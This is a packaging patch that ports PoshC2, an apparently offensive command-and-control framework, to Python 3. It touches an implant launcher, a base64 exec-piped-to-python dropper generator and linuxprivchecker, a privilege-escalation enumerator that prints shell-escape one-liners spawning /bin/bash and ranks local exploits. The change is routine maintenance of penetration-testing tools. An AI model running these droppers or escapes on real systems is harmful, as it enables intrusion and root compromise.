From: Sophie Brun <[email protected]>
Date: Tue, 19 May 2020 14:24:05 +0200
Subject: Fix shebang and update for python3
Last-update: 2020-05-19
---
poshc2/client/command_handlers/ImplantHandler.py | 2 +-
poshc2/server/payloads/Payloads.py | 2 +-
resources/modules/linuxprivchecker.py | 169 ++++++++++++-----------
3 files changed, 87 insertions(+), 86 deletions(-)
diff --git a/poshc2/client/command_handlers/ImplantHandler.py b/poshc2/client/command_handlers/ImplantHandler.py
index d882548..6c0fb2a 100644
--- a/poshc2/client/command_handlers/ImplantHandler.py
+++ b/poshc2/client/command_handlers/ImplantHandler.py
@@ -925,7 +925,7 @@ def do_creds(user, command):
def do_pwnself(user, command):
- subprocess.Popen(["python2.7", "%s%s" % (PayloadsDirectory, "py_dropper.py")])
+ subprocess.Popen(["python3", "%s%s" % (PayloadsDirectory, "py_dropper.py")])
clear()
diff --git a/poshc2/server/payloads/Payloads.py b/poshc2/server/payloads/Payloads.py
index 134e361..fb7f065 100644
--- a/poshc2/server/payloads/Payloads.py
+++ b/poshc2/server/payloads/Payloads.py
@@ -471,7 +471,7 @@ class Payloads(object):
.replace("#REPLACEUSERAGENT#", self.UserAgent)
py = base64.b64encode(self.PyDropper.encode('UTF-8'))
- pydropper = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python2 &" % (py).decode('UTF-8')
+ pydropper = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python3 &" % (py).decode('UTF-8')
with open("%s%spy_dropper.sh" % (self.BaseDirectory, name), 'w') as f:
f.write(pydropper)
diff --git a/resources/modules/linuxprivchecker.py b/resources/modules/linuxprivchecker.py
index 3023e6b..3e6ce0d 100644
--- a/resources/modules/linuxprivchecker.py
+++ b/resources/modules/linuxprivchecker.py
@@ -1,4 +1,4 @@
-#!/usr/env python
+#!/usr/bin/env python3
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
@@ -34,20 +34,21 @@ except ImportError:
bigline = "================================================================================================="
smlline = "-------------------------------------------------------------------------------------------------"
-print bigline
-print "LINUX PRIVILEGE ESCALATION CHECKER"
-print bigline
-print
+print(bigline)
+print("LINUX PRIVILEGE ESCALATION CHECKER")
+print(bigline)
+print()
# loop through dictionary, execute the commands, store the results, return updated dict
def execCmd(cmdDict):
for item in cmdDict:
cmd = cmdDict[item]["cmd"]
- if compatmode == 0: # newer version of python, use preferred subprocess
+ if compatmode == 0: # newer version of python, use preferred subprocess
out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate()
+ out = out.decode()
results = out.split('\n')
- else: # older version of python, use os.popen
- echo_stdout = os.popen(cmd, 'r')
+ else: # older version of python, use os.popen
+ echo_stdout = os.popen(cmd, 'r')
results = echo_stdout.read().split('\n')
cmdDict[item]["results"]=results
return cmdDict
@@ -55,13 +56,13 @@ def execCmd(cmdDict):
# print results for each previously executed command, no return value
def printResults(cmdDict):
for item in cmdDict:
- msg = cmdDict[item]["msg"]
- results = cmdDict[item]["results"]
- print "[+] " + msg
+ msg = cmdDict[item]["msg"]
+ results = cmdDict[item]["results"]
+ print("[+] " + msg)
for result in results:
- if result.strip() != "":
- print " " + result.strip()
- print
+ if result.strip() != "":
+ print(" " + result.strip())
+ print()
return
def writeResults(msg, results):
@@ -74,7 +75,7 @@ def writeResults(msg, results):
return
# Basic system info
-print "[*] GETTING BASIC SYSTEM INFO...\n"
+print("[*] GETTING BASIC SYSTEM INFO...\n")
results=[]
@@ -88,7 +89,7 @@ printResults(sysInfo)
# Networking Info
-print "[*] GETTING NETWORKING INFO...\n"
+print("[*] GETTING NETWORKING INFO...\n")
netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results},
"ROUTE":{"cmd":"route", "msg":"Route", "results":results},
@@ -99,7 +100,7 @@ netInfo = execCmd(netInfo)
printResults(netInfo)
# File System Info
-print "[*] GETTING FILESYSTEM INFO...\n"
+print("[*] GETTING FILESYSTEM INFO...\n")
driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results},
"FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results}
@@ -117,7 +118,7 @@ cronInfo = execCmd(cronInfo)
printResults(cronInfo)
# User Info
-print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n"
+print("\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n")
userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results},
"ID":{"cmd":"id","msg":"Current User ID", "results":results},
@@ -133,10 +134,10 @@ userInfo = execCmd(userInfo)
printResults(userInfo)
if "root" in userInfo["ID"]["results"][0]:
- print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n"
+ print("[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n")
# File/Directory Privs
-print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n"
+print("[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n")
fdPerms = {"WWDIRSROOT":{"cmd":"find / \(-wholename '/home/homedir*' -prune \) -o \(-type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
"WWDIRS":{"cmd":"find / \(-wholename '/home/homedir*' -prune \) -o \(-type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
@@ -157,7 +158,7 @@ pwdFiles = execCmd(pwdFiles)
printResults(pwdFiles)
# Processes and Applications
-print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n"
+print("[*] ENUMERATING PROCESSES AND APPLICATIONS...\n")
if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]:
getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian
@@ -179,7 +180,7 @@ otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Ve
otherApps = execCmd(otherApps)
printResults(otherApps)
-print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n"
+print("[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n")
# find the package information for the processes currently running
# under root or another super user
@@ -192,52 +193,52 @@ procdict = {} # dictionary to hold the processes running as super users
for proc in procs: # loop through each process
relatedpkgs = [] # list to hold the packages related to a process
try:
- for user in supusers: # loop through the known super users
- if (user != "") and (user in proc): # if the process is being run by a super user
- procname = proc.split(" ")[4] # grab the process name
- if "/" in procname:
- splitname = procname.split("/")
- procname = splitname[len(splitname)-1]
- for pkg in pkgs: # loop through the packages
- if not len(procname) < 3: # name too short to get reliable package results
- if procname in pkg:
- if procname in procdict:
- relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list
- if pkg not in relatedpkgs:
- relatedpkgs.append(pkg) # add pkg to the list
+ for user in supusers: # loop through the known super users
+ if (user != "") and (user in proc): # if the process is being run by a super user
+ procname = proc.split(" ")[4] # grab the process name
+ if "/" in procname:
+ splitname = procname.split("/")
+ procname = splitname[len(splitname)-1]
+ for pkg in pkgs: # loop through the packages
+ if not len(procname) < 3: # name too short to get reliable package results
+ if procname in pkg:
+ if procname in procdict:
+ relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list
+ if pkg not in relatedpkgs:
+ relatedpkgs.append(pkg) # add pkg to the list
procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry
except:
- pass
+ pass
for key in procdict:
- print " " + key # print the process name
+ print(" " + key) # print the process name
try:
if not procdict[key][0] == "": # only print the rest if related packages were found
- print " Possible Related Packages: "
+ print(" Possible Related Packages: ")
for entry in procdict[key]:
- print " " + entry # print each related package
+ print(" " + entry) # print each related package
except:
- pass
+ pass
# EXPLOIT ENUMERATION
# First discover the avaialable tools
-print
-print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n"
+print()
+print("[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n")
devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}}
devTools = execCmd(devTools)
printResults(devTools)
-print "[+] Related Shell Escape Sequences...\n"
+print("[+] Related Shell Escape Sequences...\n")
escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]}
for cmd in escapeCmd:
for result in devTools["TOOLS"]["results"]:
if cmd in result:
- for item in escapeCmd[cmd]:
- print " " + cmd + "-->\t" + item
-print
-print "[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n"
+ for item in escapeCmd[cmd]:
+ print(" " + cmd + "-->\t" + item)
+print()
+print("[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n")
# Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
# sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os'
@@ -328,45 +329,45 @@ for sploit in sploits:
# first check for kernell applicability
if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]):
# next check language applicability
- if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))):
- lang = 1 # language found, increase applicability score
- elif sploits[sploit]["lang"] == "sh":
- lang = 1 # language found, increase applicability score
- elif (sploits[sploit]["lang"] in str(langs)):
- lang = 1 # language found, increase applicability score
- if lang == 0:
- sploitout = sploitout + "**" # added mark if language not detected on system
+ if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))):
+ lang = 1 # language found, increase applicability score
+ elif sploits[sploit]["lang"] == "sh":
+ lang = 1 # language found, increase applicability score
+ elif (sploits[sploit]["lang"] in str(langs)):
+ lang = 1 # language found, increase applicability score
+ if lang == 0:
+ sploitout = sploitout + "**" # added mark if language not detected on system
# next check keyword matches to determine if some sploits have a higher probability of success
- for loc in sploits[sploit]["keywords"]["loc"]:
- if loc == "proc":
- for proc in procs:
- if keyword in proc:
- highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability
- break
- break
- elif loc == "os":
- if (keyword in os) or (keyword in kernel):
- highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability
- break
- elif loc == "mnt":
- if keyword in mount:
- highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability
- break
- else:
- avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version
-
-print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!"
-print
-
-print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system"
+ for loc in sploits[sploit]["keywords"]["loc"]:
+ if loc == "proc":
+ for proc in procs:
+ if keyword in proc:
+ highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability
+ break
+ break
+ elif loc == "os":
+ if (keyword in os) or (keyword in kernel):
+ highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability
+ break
+ elif loc == "mnt":
+ if keyword in mount:
+ highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability
+ break
+ else:
+ avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version
+
+print(" Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!")
+print()
+
+print(" The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system")
for exploit in highprob:
- print " - " + exploit
-print
+ print(" - " + exploit)
+print()
-print " The following exploits are applicable to this kernel version and should be investigated as well"
+print(" The following exploits are applicable to this kernel version and should be investigated as well")
for exploit in avgprob:
- print " - " + exploit
+ print(" - " + exploit)
-print
-print "Finished"
-print bigline
+print()
+print("Finished")
+print(bigline)